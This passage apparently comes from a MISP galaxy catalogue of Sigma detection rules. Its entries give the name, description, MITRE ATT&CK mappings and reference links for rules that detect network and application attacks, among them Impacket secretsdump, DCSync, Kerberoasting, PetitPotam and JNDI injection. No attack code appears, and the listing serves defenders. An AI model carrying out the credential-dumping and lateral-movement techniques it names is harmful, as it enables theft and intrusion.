  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 8857. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609

https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml

Cisco LDP Authentication Failures

Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels

The tag is: misp-galaxy:sigma-rules="Cisco LDP Authentication Failures"

Cisco LDP Authentication Failures has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8858. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml

Cisco BGP Authentication Failures

Detects BGP failures which may be indicative of brute force attacks to manipulate routing

The tag is: misp-galaxy:sigma-rules="Cisco BGP Authentication Failures"

Cisco BGP Authentication Failures has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8859. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml

Huawei BGP Authentication Failures

Detects BGP failures which may be indicative of brute force attacks to manipulate routing.

The tag is: misp-galaxy:sigma-rules="Huawei BGP Authentication Failures"

Huawei BGP Authentication Failures has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

Table 8860. Table References

Links

https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/huawei/bgp/huawei_bgp_auth_failed.yml

Default Cobalt Strike Certificate

Detects the presence of default Cobalt Strike certificate in the HTTPS traffic

The tag is: misp-galaxy:sigma-rules="Default Cobalt Strike Certificate"

Table 8861. Table References

Links

https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml

Publicly Accessible RDP Service

Detects connections from routable IPs to an RDP listener, which is indicative of a publicly accessible RDP service.

The tag is: misp-galaxy:sigma-rules="Publicly Accessible RDP Service"

Publicly Accessible RDP Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 8862. Table References

Links

https://attack.mitre.org/techniques/T1021/001/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml

Kerberos Network Traffic RC4 Ticket Encryption

Detects Kerberos TGS requests using RC4 encryption, which may be indicative of Kerberoasting

The tag is: misp-galaxy:sigma-rules="Kerberos Network Traffic RC4 Ticket Encryption"

Kerberos Network Traffic RC4 Ticket Encryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 8863. Table References

Links

https://adsecurity.org/?p=3458

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml

Potential PetitPotam Attack Via EFS RPC Calls

Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. The usage of this RPC function should be rare, if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP. Logs from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.

The tag is: misp-galaxy:sigma-rules="Potential PetitPotam Attack Via EFS RPC Calls"

Potential PetitPotam Attack Via EFS RPC Calls has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 8864. Table References

Links

https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp

https://msrc.microsoft.com/update-guide/vulnerability/ADV210003

https://threatpost.com/microsoft-petitpotam-poc/168163/

https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml

WebDav Put Request

A general detection for the WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.

The tag is: misp-galaxy:sigma-rules="WebDav Put Request"

WebDav Put Request has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 8865. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/17

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml

Remote Task Creation via ATSVC Named Pipe - Zeek

Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe

The tag is: misp-galaxy:sigma-rules="Remote Task Creation via ATSVC Named Pipe - Zeek"

Remote Task Creation via ATSVC Named Pipe - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8866. Table References

Links

https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml

Executable from Webdav

Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/

The tag is: misp-galaxy:sigma-rules="Executable from Webdav"

Executable from Webdav has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 8867. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29

http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml

DNS TOR Proxies

Identifies IPs performing DNS lookups associated with common Tor proxies.

The tag is: misp-galaxy:sigma-rules="DNS TOR Proxies"

DNS TOR Proxies has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 8868. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml

OMIGOD HTTP No Authentication RCE

Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote command execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.

The tag is: misp-galaxy:sigma-rules="OMIGOD HTTP No Authentication RCE"

OMIGOD HTTP No Authentication RCE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 8869. Table References

Links

https://twitter.com/neu5ron/status/1438987292971053057?s=20

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml

MITRE BZAR Indicators for Execution

Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.

The tag is: misp-galaxy:sigma-rules="MITRE BZAR Indicators for Execution"

MITRE BZAR Indicators for Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8870. Table References

Links

https://github.com/mitre-attack/bzar#indicators-for-attck-execution

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml

Possible Impacket SecretDump Remote Activity - Zeek

Detects AD credential dumping using the Impacket secretsdump hacktool (HKTL). Based on the Sigma rule rules/windows/builtin/win_impacket_secretdump.yml

The tag is: misp-galaxy:sigma-rules="Possible Impacket SecretDump Remote Activity - Zeek"

Possible Impacket SecretDump Remote Activity - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 8871. Table References

Links

https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml

Suspicious PsExec Execution - Zeek

Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a different PsExec client than the Sysinternals one.

The tag is: misp-galaxy:sigma-rules="Suspicious PsExec Execution - Zeek"

Suspicious PsExec Execution - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8872. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml

New Kind of Network (NKN) Detection

NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>

The tag is: misp-galaxy:sigma-rules="New Kind of Network (NKN) Detection"

Table 8873. Table References

Links

https://github.com/Maka8ka/NGLite

https://github.com/nknorg/nkn-sdk-go

https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml

MITRE BZAR Indicators for Persistence

Windows DCE-RPC functions which indicate a persistence technique on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.

The tag is: misp-galaxy:sigma-rules="MITRE BZAR Indicators for Persistence"

MITRE BZAR Indicators for Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

Table 8874. Table References

Links

https://github.com/mitre-attack/bzar#indicators-for-attck-persistence

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml

SMB Spoolss Name Piped Usage

Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the spooler service enabled.

The tag is: misp-galaxy:sigma-rules="SMB Spoolss Name Piped Usage"

SMB Spoolss Name Piped Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8875. Table References

Links

https://dirkjanm.io/a-different-way-of-abusing-zerologon/

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://twitter.com/_dirkjan/status/1309214379003588608

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml

DNS Events Related To Mining Pools

Identifies clients that may be performing DNS lookups associated with common currency mining pools.

The tag is: misp-galaxy:sigma-rules="DNS Events Related To Mining Pools"

DNS Events Related To Mining Pools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 8876. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml

Possible PrintNightmare Print Driver Install

Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally or through group policy.

The tag is: misp-galaxy:sigma-rules="Possible PrintNightmare Print Driver Install"

Table 8877. Table References

Links

https://github.com/corelight/CVE-2021-1675

https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/

https://old.zeek.org/zeekweek2019/slides/bzar.pdf

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29

https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml

Suspicious Access to Sensitive File Extensions - Zeek

Detects known sensitive file extensions via Zeek

The tag is: misp-galaxy:sigma-rules="Suspicious Access to Sensitive File Extensions - Zeek"

Table 8878. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml

First Time Seen Remote Named Pipe - Zeek

This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes.

The tag is: misp-galaxy:sigma-rules="First Time Seen Remote Named Pipe - Zeek"

First Time Seen Remote Named Pipe - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8879. Table References

Links

https://twitter.com/menasec1/status/1104489274387451904

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml

Transferring Files with Credential Data via Network Shares - Zeek

Transferring files with well-known filenames (sensitive files with credential data) using network shares

The tag is: misp-galaxy:sigma-rules="Transferring Files with Credential Data via Network Shares - Zeek"

Transferring Files with Credential Data via Network Shares - Zeek has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 8880. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml

Suspicious DNS Z Flag Bit Set

The DNS Z flag is a bit within the DNS protocol header that, per the IETF design, is reserved (unused). Although it has recently been used in DNSSEC, a value other than 0 should be rare. Otherwise, if it is set to non-0 and DNSSEC is being used, excluding the legitimate domains is low effort and high reward. Determine whether multiple of these files were accessed in a short period of time to further assess whether this was a one-off or part of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs

The tag is: misp-galaxy:sigma-rules="Suspicious DNS Z Flag Bit Set"

Suspicious DNS Z Flag Bit Set has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 8881. Table References

Links

https://tools.ietf.org/html/rfc2929#section-2.1

https://twitter.com/neu5ron/status/1346245602502443009

https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS

https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma

https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml

Django Framework Exceptions

Detects suspicious Django web application framework exceptions that could indicate exploitation attempts

The tag is: misp-galaxy:sigma-rules="Django Framework Exceptions"

Django Framework Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8882. Table References

Links

https://docs.djangoproject.com/en/1.11/topics/logging/#django-security

https://docs.djangoproject.com/en/1.11/ref/exceptions/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml

Potential RCE Exploitation Attempt In NodeJS

Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.

The tag is: misp-galaxy:sigma-rules="Potential RCE Exploitation Attempt In NodeJS"

Potential RCE Exploitation Attempt In NodeJS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8883. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/nodejs/nodejs_rce_exploitation_attempt.yml

Spring Framework Exceptions

Detects suspicious Spring framework exceptions that could indicate exploitation attempts

The tag is: misp-galaxy:sigma-rules="Spring Framework Exceptions"

Spring Framework Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8884. Table References

Links

https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html

https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_application_exceptions.yml

Potential SpEL Injection In Spring Framework

Detects potential SpEL Injection exploitation, which may lead to RCE.

The tag is: misp-galaxy:sigma-rules="Potential SpEL Injection In Spring Framework"

Potential SpEL Injection In Spring Framework has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8885. Table References

Links

https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_spel_injection.yml

Python SQL Exceptions

Generic rule for SQL exceptions in Python according to PEP 249

The tag is: misp-galaxy:sigma-rules="Python SQL Exceptions"

Python SQL Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8886. Table References

Links

https://www.python.org/dev/peps/pep-0249/#exceptions

https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml

Potential OGNL Injection Exploitation In JVM Based Application

Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the cause of some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134).

The tag is: misp-galaxy:sigma-rules="Potential OGNL Injection Exploitation In JVM Based Application"

Potential OGNL Injection Exploitation In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8887. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_ognl_injection_exploitation_attempt.yml

Potential Local File Read Vulnerability In JVM Based Application

Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it’s a red flag.

The tag is: misp-galaxy:sigma-rules="Potential Local File Read Vulnerability In JVM Based Application"

Potential Local File Read Vulnerability In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8888. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_local_file_read.yml

Process Execution Error In JVM Based Application

Detects process execution related exceptions in JVM based apps, often relates to RCE

The tag is: misp-galaxy:sigma-rules="Process Execution Error In JVM Based Application"

Process Execution Error In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8889. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_rce_exploitation_attempt.yml

Potential XXE Exploitation Attempt In JVM Based Application

Detects XML parsing issues. If the application expects to work with XML, make sure that the parser is initialized safely.

The tag is: misp-galaxy:sigma-rules="Potential XXE Exploitation Attempt In JVM Based Application"

Potential XXE Exploitation Attempt In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8890. Table References

Links

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://owasp.org/www-community/vulnerabilities/XML_External_Entity(XXE)_Processing

https://rules.sonarsource.com/java/RSPEC-2755

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml

Potential JNDI Injection Exploitation In JVM Based Application

Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.

The tag is: misp-galaxy:sigma-rules="Potential JNDI Injection Exploitation In JVM Based Application"

Potential JNDI Injection Exploitation In JVM Based Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8891. Table References

Links

https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0

https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs

https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_jndi_injection_exploitation_attempt.yml

Suspicious SQL Error Messages

Detects SQL error messages that indicate probing for an injection attack

The tag is: misp-galaxy:sigma-rules="Suspicious SQL Error Messages"

Suspicious SQL Error Messages has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8892. Table References

Links

http://www.sqlinjection.net/errors

https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml

Ruby on Rails Framework Exceptions

Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts

The tag is: misp-galaxy:sigma-rules="Ruby on Rails Framework Exceptions"

Ruby on Rails Framework Exceptions has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 8893. Table References

Links

https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb

http://edgeguides.rubyonrails.org/security.html

https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception

http://guides.rubyonrails.org/action_controller_overview.html

https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml

SharpHound Recon Account Discovery

Detects remote RPC calls used by SharpHound to map remote connections and local group membership.

The tag is: misp-galaxy:sigma-rules="SharpHound Recon Account Discovery"

SharpHound Recon Account Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 8894. Table References

Links

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3

https://github.com/zeronetworks/rpcfirewall

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml

Remote Server Service Abuse for Lateral Movement

Detects remote RPC calls that possibly abuse the remote encryption service via MS-EFSR.

The tag is: misp-galaxy:sigma-rules="Remote Server Service Abuse for Lateral Movement"

Remote Server Service Abuse for Lateral Movement has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8897. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml

Remote Schedule Task Lateral Movement via ATSvc

Detects remote RPC calls to create or execute a scheduled task via ATSvc

The tag is: misp-galaxy:sigma-rules="Remote Schedule Task Lateral Movement via ATSvc"

Remote Schedule Task Lateral Movement via ATSvc has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="At - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 8898. Table References

Links

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml

Possible DCSync Attack

Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.

The tag is: misp-galaxy:sigma-rules="Possible DCSync Attack"

Possible DCSync Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 8899. Table References

Links

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN

https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml

Remote Event Log Recon

Detects remote RPC calls to get event log information via EVEN or EVEN6

The tag is: misp-galaxy:sigma-rules="Remote Event Log Recon"

Table 8900. Table References

Links

https://github.com/zeronetworks/rpcfirewall

https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/

https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml

Remote Schedule Task Lateral Movement via ITaskSchedulerService

Detects remote RPC calls to create or execute a scheduled task

The tag is: misp-galaxy:sigma-rules="Remote Schedule Task Lateral Movement via ITaskSchedulerService"

Remote Schedule Task Lateral Movement via ITaskSchedulerService has relationships with:

